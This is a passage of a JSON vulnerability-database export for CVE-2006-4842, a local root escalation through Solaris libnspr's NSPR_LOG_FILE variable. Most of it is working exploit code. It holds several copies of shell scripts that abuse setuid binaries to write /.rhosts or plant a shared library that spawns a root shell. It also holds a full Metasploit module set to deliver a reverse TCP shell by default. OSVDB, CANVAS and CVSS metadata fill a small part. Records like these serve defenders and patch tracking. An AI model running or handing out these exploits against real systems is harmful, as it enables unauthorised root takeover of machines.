datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n # Create writable file in /usr/lib/secure\r\n lib_path = '/usr/lib/secure'\r\n lib_name = 'libldap.so.5'\r\n\r\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\r\n cmd_exec 'umask 0'\r\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\r\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\r\n cmd_exec 'umask 022'\r\n\r\n unless is_writable? \"#{lib_path}/#{lib_name}\"\r\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\r\n end\r\n\r\n print_good \"Created file #{lib_path}/#{lib_name}\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and compile shared object\r\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\r\n mkdir base_path\r\n\r\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\r\n payload_path = \"#{base_path}/#{payload_name}\"\r\n\r\n so = <<-EOF\r\n void __attribute__((constructor)) cons() {\r\n setuid(0);\r\n setgid(0);\r\n execle(\"#{payload_path}\", \"\", 0, 0);\r\n _exit(0);\r\n }\r\n EOF\r\n\r\n so_name = \".#{rand_text_alphanumeric 5..10}\"\r\n so_path = \"#{base_path}/#{so_name}\"\r\n upload_and_compile so_path, so\r\n\r\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\r\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and execute payload\r\n upload payload_path, generate_payload_exe\r\n cmd_exec \"chmod +x #{payload_path}\"\r\n\r\n print_status 'Executing payload...'\r\n cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\r\n end\r\nend\n\n# 0day.today [2018-09-18] #", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31125"}], "exploitpack": [{"lastseen": 
"2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - Constructor Arbitrary File Creation Privilege Escalation (3)", "edition": 1, "published": "2006-10-24T00:00:00", "title": "Solaris 10 libnspr - Constructor Arbitrary File Creation Privilege Escalation (3)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EXPLOITPACK:17D069ABD6EE3DA02F1E1EC965F0B525", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\n#\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of \n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Yet another newschool version of the local root exploit: this time we place\n# our code in the global constructor (ctors) for the library, as suggested by\n# gera. This way, we don't have to hide a real function and we have a generic\n# library that can be used in all exploits like this. To avoid annoying side-\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\n# a library in the default search path.\n#\n# See also:\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\n#\n# Usage:\n# $ chmod +x raptor_libnspr3\n# $ ./raptor_libnspr3\n# [...]\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=1(other)\n# # rm /usr/lib/secure/libldap.so.5\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/sbin/lpmove\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\necho \" setuid(0);\" >> /tmp/ctors.c\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\necho \"}\" >> /tmp/ctors.c\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\nif [ $? 
-ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_LIBRARY_PATH foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_LIBRARY_PATH=/usr/lib/secure su -\n\n# milw0rm.com [2006-10-24]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (2)", "edition": 1, "published": "2006-10-16T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-16T00:00:00", "id": "EXPLOITPACK:2A9D47E1F6624AC9BF9BB6A1948A6B9A", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\n#\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\n#\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\n#\n# Usage:\n# $ chmod +x raptor_libnspr2\n# $ ./raptor_libnspr2\n# [...]\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=0(root)\n# # rm /usr/lib/secure/getuid.so\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"int getuid(){return 0;}\" > /tmp/getuid.c\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\nif [ $? 
-ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_PRELOAD foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\n\n# milw0rm.com [2006-10-16]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)", "edition": 1, "published": "2006-10-24T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EXPLOITPACK:0A06BEDE6DDAF9E385796FE859D61F71", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/20471/info\n \nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\n \nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \n \nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\n\n#!/bin/sh\n\n#\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\n#\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of \n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Yet another newschool version of the local root exploit: this time we place\n# our code in the global constructor (ctors) for the library, as suggested by\n# gera. 
This way, we don't have to hide a real function and we have a generic\n# library that can be used in all exploits like this. To avoid annoying side-\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\n# a library in the default search path.\n#\n# See also:\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\n#\n# Usage:\n# $ chmod +x raptor_libnspr3\n# $ ./raptor_libnspr3\n# [...]\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=1(other)\n# # rm /usr/lib/secure/libldap.so.5\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/sbin/lpmove\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\necho \" setuid(0);\" >> /tmp/ctors.c\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\necho \"}\" >> /tmp/ctors.c\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\nif [ $? 
-ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_LIBRARY_PATH foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_LIBRARY_PATH=/usr/lib/secure su -", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)", "edition": 1, "published": "2006-10-13T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EXPLOITPACK:ABFA17484219E850FDCB9E3C93B96A12", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/20471/info\n\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\n\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \n\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\n\n#!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. 
Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho \"+ +\" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)", "edition": 1, "published": "2006-10-13T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EXPLOITPACK:BF4CC01D6A1DE78B9EEA2F44B218D100", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or 
overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho \"+ +\" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i\n\n# milw0rm.com [2006-10-13]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-4842"], "edition": 1, "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. 
However, Sun has released a patch to address this vulnerability.\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1)\nSecurity Tracker: 1017050\n[Secunia Advisory ID:22348](https://secuniaresearch.flexerasoftware.com/advisories/22348/)\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=418\nKeyword: NSPR\nISS X-Force ID: 29489\nFrSIRT Advisory: ADV-2006-4016\n[CVE-2006-4842](https://vulners.com/cve/CVE-2006-4842)\nBugtraq ID: 20471\n", "modified": "2006-10-11T00:00:00", "published": "2006-10-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:29610", "id": "OSVDB:29610", "title": "Netscape Portable Runtime Arbitrary File Overwrite", "type": "osvdb", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "description": "**Name**| CVE_2006_4842 \n---|--- \n**CVE**| CVE-2006-4842 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2006-4842: libnspr2 \n**Notes**| CVE Name: CVE-2006-4842 \nVENDOR: Sun \nVersionsAffected: 10 \nRepeatability: unlimited \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4842 \nCVSS: 3.6 \n\n", "edition": 2, "modified": "2006-10-12T00:07:00", "published": "2006-10-12T00:07:00", "id": "CVE_2006_4842", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2006_4842", "type": "canvas", "title": "Immunity Canvas: CVE_2006_4842", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T00:42:54", "description": "This module exploits an arbitrary file write vulnerability in the Netscape Portable Runtime library (libnspr) on unpatched Solaris systems prior to Solaris 10u3 which allows users to gain root privileges. 
libnspr versions prior to 4.6.3 allow users to specify a log file with the `NSPR_LOG_FILE` environment variable. The log file is created with the privileges of the running process, resulting in privilege escalation when used in combination with a SUID executable. This module writes a shared object to the trusted library directory `/usr/lib/secure` and runs the specified SUID binary with the shared object loaded using the `LD_LIBRARY_PATH` environment variable. This module has been tested successfully with libnspr version 4.5.1 on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\n", "published": "2018-09-11T08:11:11", "type": "metasploit", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2019-01-10T19:19:14", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/LIBNSPR_NSPR_LOG_FILE_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',\n 'Description' => %q{\n This module exploits an arbitrary file write vulnerability in the\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\n prior to Solaris 10u3 which allows users to gain root privileges.\n\n libnspr versions prior to 4.6.3 allow users to specify a log file with\n the `NSPR_LOG_FILE` environment variable. 
The log file is created with\n the privileges of the running process, resulting in privilege escalation\n when used in combination with a SUID executable.\n\n This module writes a shared object to the trusted library directory\n `/usr/lib/secure` and runs the specified SUID binary with the shared\n object loaded using the `LD_LIBRARY_PATH` environment variable.\n\n This module has been tested successfully with libnspr version 4.5.1\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\n },\n 'References' =>\n [\n ['BID', '20471'],\n ['CVE', '2006-4842'],\n ['EDB', '2543'],\n ['EDB', '2569'],\n ['EDB', '2641'],\n ['URL', 'https://securitytracker.com/id/1017050'],\n ['URL', 'https://securitytracker.com/id/1017051'],\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\n ],\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'iDefense', # Discovery\n 'Marco Ivaldi', # Exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Oct 11 2006',\n 'Privileged' => true,\n 'Platform' => ['solaris'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\n 'Targets' => [['Auto', {}]],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n # Some useful example SUID executables:\n # * /usr/bin/cancel\n # * /usr/bin/chkey\n # * /usr/bin/lp\n # * /usr/bin/lpset\n # * /usr/bin/lpstat\n # * /usr/lib/lp/bin/netpr\n # * /usr/sbin/lpmove\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override 
check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def suid_bin_path\n datastore['SUID_PATH']\n end\n\n def is_writable?(path)\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\n end\n\n def mkdir(path)\n vprint_status \"Creating directory '#{path}'\"\n cmd_exec \"mkdir -p '#{path}'\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def check\n unless setuid? suid_bin_path\n vprint_error \"#{suid_bin_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{suid_bin_path} is setuid\"\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\n # Earlier versions may also be vulnerable\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\n if libnspr_pkg_version.to_s.eql? 
''\n vprint_error 'Could not determine libnspr version'\n return CheckCode::Unknown\n end\n\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\n\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\n # however third-party software may also introduce a vulnerable version of the library.\n version = kernel_release\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n # The vulnerability was patched in various Solaris patches for different platforms.\n # For more information, see:\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\n installed_patches = cmd_exec 'showrev -p'\n [\n 119214, # Solaris 10 (x86) patch 119214-10\n 119213, # Solaris 10 (SPARC) patch 119213-10\n 119212, # Solaris 9 (x86) patch 119212-10\n 119211, # Solaris 9 (SPARC) patch 119211-10\n 119209 # Solaris 8 (SPARC) patch 119209-10\n ].each do |patch|\n if installed_patches =~ / #{patch}-(\\d+)/\n revision = $1.to_i\n if revision >= 10\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\n return CheckCode::Safe\n end\n end\n end\n vprint_good 'Solaris patches are not installed'\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless [CheckCode::Detected, CheckCode::Appears].include? 
check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless is_writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n # Create writable file in /usr/lib/secure\n lib_path = '/usr/lib/secure'\n lib_name = 'libldap.so.5'\n\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\n cmd_exec 'umask 0'\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\n cmd_exec 'umask 022'\n\n unless is_writable? \"#{lib_path}/#{lib_name}\"\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\n end\n\n print_good \"Created file #{lib_path}/#{lib_name}\"\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\n\n # Upload and compile shared object\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n\n so = <<-EOF\n void __attribute__((constructor)) cons() {\n setuid(0);\n setgid(0);\n execle(\"#{payload_path}\", \"\", 0, 0);\n _exit(0);\n }\n EOF\n\n so_name = \".#{rand_text_alphanumeric 5..10}\"\n so_path = \"#{base_path}/#{so_name}\"\n upload_and_compile so_path, so\n\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\n\n # Upload and execute payload\n upload payload_path, generate_payload_exe\n cmd_exec \"chmod +x #{payload_path}\"\n\n print_status 'Executing payload...'\n cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\n end\nend\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb"}], "seebug": [{"lastseen": "2017-11-19T15:58:36", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (2)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82336", "id": "SSV:82336", "sourceData": "\n source: http://www.securityfocus.com/bid/20471/info\r\n \r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n \r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n \r\nVersion 4.6.1 